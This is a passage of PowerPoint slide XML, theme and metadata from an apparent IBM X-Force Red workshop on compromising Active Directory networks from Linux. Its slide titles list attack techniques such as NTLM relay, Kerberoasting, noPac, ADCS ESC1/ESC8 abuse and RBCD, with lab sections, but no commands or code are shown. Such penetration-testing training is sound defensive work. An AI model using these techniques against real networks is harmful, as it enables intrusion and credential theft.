            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F6A0012-D188-AFBC-FF3A-57E624554BD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171473" y="610556"/>
            <a:ext cx="6376363" cy="3580715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1648496-7A1B-79C9-7DFD-82AF1B52C12B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200399"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dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C51343-F34F-04CF-B829-C0619B14C97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3379424" y="4277987"/>
            <a:ext cx="24471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Meme idea from: https://posts.specterops.io/certified-pre-owned-d95910965cd2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7969385"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="IBM X-Force Red 2020 template">
  <a:themeElements>
    <a:clrScheme name="IBM X-Force 2020">
      <a:dk1>
        <a:srgbClr val="FFFFFF"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="000000"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="F2F3F8"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="373C41"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="D5D9E0"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="A2191F"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="DA1E28"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="FF8389"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FA4D56"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="D12771"/>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X-Force-Red_Master_Presentation_2020_v01" id="{F42EC66B-D027-624F-8757-3C76323B367F}" vid="{0A097D26-064C-1244-AE6D-70819C83FCFD}"/>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X-Force Red 2020 template</Template>
  <TotalTime>20141</TotalTime>
  <Words>5394</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>595</Paragraphs>
  <Slides>71</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71</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="85" baseType="lpstr">
      <vt:lpstr>.AppleSystemUIFont</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial,Sans-Serif</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>HelvNeue Light for IBM</vt:lpstr>
      <vt:lpstr>IBM Plex Sans</vt:lpstr>
      <vt:lpstr>IBM Plex Sans ExtraLight</vt:lpstr>
      <vt:lpstr>IBM Plex Sans Light</vt:lpstr>
      <vt:lpstr>IBM Plex Sans Medium</vt:lpstr>
      <vt:lpstr>IBM Plex Sans SemiBold</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>IBM X-Force Red 2020 template</vt:lpstr>
      <vt:lpstr>How Most Internal Networks are Compromised: A Set of Common Active Directory Attacks and How to Perform Them from Linux   </vt:lpstr>
      <vt:lpstr>Agenda </vt:lpstr>
      <vt:lpstr>Who Are We</vt:lpstr>
      <vt:lpstr>Before we begin</vt:lpstr>
      <vt:lpstr>Precursor</vt:lpstr>
      <vt:lpstr>Precursor &gt; Lab Disclaimer</vt:lpstr>
      <vt:lpstr>Precursor &gt; Lab Access (Teleport)</vt:lpstr>
      <vt:lpstr>Precursor &gt; Why is this all about Active Directory?</vt:lpstr>
      <vt:lpstr>Precursor &gt; Active Directory Meme</vt:lpstr>
      <vt:lpstr>Precursor &gt; Internal Network Penetration Test</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Precursor &gt; Active Directory Lexicon</vt:lpstr>
      <vt:lpstr>Precursor &gt; Active Directory &gt; AD Objects</vt:lpstr>
      <vt:lpstr>Precursor &gt; Windows Password Hashing</vt:lpstr>
      <vt:lpstr>Precursor &gt; Active Directory Key Protocols </vt:lpstr>
      <vt:lpstr>Precursor &gt; Environment Notes</vt:lpstr>
      <vt:lpstr>Initial Access</vt:lpstr>
      <vt:lpstr>Initial Access &gt; No AD Access </vt:lpstr>
      <vt:lpstr>Initial Access &gt; No AD Access &gt; DHCP/DNS Recon </vt:lpstr>
      <vt:lpstr>Initial Access &gt; No AD Access &gt; SMB Recon</vt:lpstr>
      <vt:lpstr>Initial Access &gt; Lab 1</vt:lpstr>
      <vt:lpstr>Initial Access &gt; No AD Access &gt; LLMNR/NBT-NS Poisoning</vt:lpstr>
      <vt:lpstr>Initial Access &gt; No AD Access &gt; LLMNR/NBT-NS Poisoning </vt:lpstr>
      <vt:lpstr>Initial Access &gt; No AD Access &gt; Net-NTLM Authentication</vt:lpstr>
      <vt:lpstr>Initial Access &gt; No AD Access &gt; NTLM Relay </vt:lpstr>
      <vt:lpstr>Initial Access &gt; No AD Access &gt; NTLM Relay  </vt:lpstr>
      <vt:lpstr>Initial Access &gt; If-Admin*</vt:lpstr>
      <vt:lpstr>Initial Access &gt; Lab 2</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>AD Privilege Esca​lation </vt:lpstr>
      <vt:lpstr>AD Privilege Escalation &gt; What is Kerberos</vt:lpstr>
      <vt:lpstr>AD Privilege Escalation &gt; What is Kerberos</vt:lpstr>
      <vt:lpstr>AD Privilege Escalation &gt; Kerberos &gt; TGT</vt:lpstr>
      <vt:lpstr>AD Privilege Escalation &gt; Kerberos &gt; TGT </vt:lpstr>
      <vt:lpstr>AD Privilege Escalation &gt; Kerberos &gt; Service Ticket </vt:lpstr>
      <vt:lpstr>AD Privilege Escalation &gt; Kerberos &gt; Service Ticket</vt:lpstr>
      <vt:lpstr>AD Privilege Escalation &gt; Kerberos &gt; Kerberoasting – Attacking Service Tickets</vt:lpstr>
      <vt:lpstr>AD Privilege Escalation &gt; Kerberos &gt; AS-REP Roasting – Attacking TGTs </vt:lpstr>
      <vt:lpstr>AD Privilege Escalation &gt; Bloodhound </vt:lpstr>
      <vt:lpstr>AD Privilege Escalation &gt; Shadow Creds</vt:lpstr>
      <vt:lpstr>AD Privilege Escalation &gt; Shadow Creds– How To</vt:lpstr>
      <vt:lpstr>AD Privilege Escalation &gt; Lab 3 </vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; noPac Abuse</vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; noPac Abuse : Exploitation Steps</vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; noPac Abuse : Exploitation Steps Continued</vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; noPac Abuse : Easy Linux Exploitation</vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; Authentication Coercion</vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; Authentication Coercion</vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; Active Directory Certificate Services (ADCS) Overview</vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; ADCS - Certificate Templates</vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; ADCS - Subject Alternative Names (SANs)</vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; Misconfigured Certificate Templates: ESC1</vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; Misconfigured Certificate Templates: ESC1 – How To</vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; Certificate Authority Allows Rogue SAN's : ESC6 </vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; Lab 4</vt:lpstr>
      <vt:lpstr>DA, now what? &gt; Password Reuse into Kerbrute</vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; RBCD </vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; RBCD </vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; RBCD </vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; RBCD Prerequisites</vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; RBCD How To</vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; RBCD How To Continued</vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; Auth Coercion + ESC8</vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; PetitPotam Authentication Coercion</vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; NTLM relay to AD CS HTTP Endpoints - ESC8</vt:lpstr>
      <vt:lpstr>DA Privilege Escalation&gt; NTLM relay to AD CS HTTP Endpoints - ESC8 – How To</vt:lpstr>
      <vt:lpstr>DA Privilege Escalation &gt; Lab 5</vt:lpstr>
      <vt:lpstr>Going Further</vt:lpstr>
      <vt:lpstr>Questions?</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Penetration Testing </dc:title>
  <dc:subject/>
  <dc:creator>Scott Brink</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Scott E Brink</cp:lastModifiedBy>
  <cp:revision>4696</cp:revision>
  <cp:lastPrinted>2019-03-25T19:43:29Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-06-15T02:32:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-08T17:48:31Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>